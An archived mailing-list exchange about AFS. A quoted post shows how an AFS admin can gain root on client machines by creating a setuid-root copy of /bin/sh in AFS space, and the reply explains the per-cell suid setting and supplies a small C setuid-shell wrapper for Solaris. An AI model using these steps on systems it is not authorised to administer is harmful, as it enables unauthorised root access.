> At Brookhaven National lab, we just found something very interseting.
> That is if you know AFS admin password, you can become root on any
> AFS client machines in the cell (except Solaris machines). We did the
> following tests on AIX, SGI, HPUX and we succeded. Solaris somehow is
> smart enough to stop the break-in.
>
> login as user on any AFS client machine belong to your cell
> % klog admin
> % cd /afs/<your-cell>
> % cp /bin/sh .
> % chown root sh
> % chmod 4755 sh
> % ./sh
> % whoami
> root
>
> In other words, If I am AFS administrator, I can be root on any AFS client
> machines belong to my cell. Is it cool ?
Yes. Actually, it's quite useful, in many cases. By default, this
behaviour is enabled for the local cell, and disabled for any other cell.
You can use 'fs setcell <cell> -suid' to turn it on, or
'fs setcell <cell> -nosuid' to turn it off, for any particular cell
(including the local cell). This setting is per-client.
Incidentally, it's not so much that Solaris is "smart" as that the
shell tries really hard to prevent itself from being invoked setuid,
or to run a setuid script. Below is a small C program that I use when
I need this ability on a Solaris machine:
extern int errno;
main()
{
if (setuid(0)) {
printf("Setuid failed: %d\n", errno);
exit(0);
}
execl("/bin/sh", "sh", "-i", 0);
}
-- Jeffrey T. Hutzelman (N3NHS) <[EMAIL PROTECTED]>
Systems Programmer, CMU SCS Research Facility
Please send requests and problem reports to [EMAIL PROTECTED]
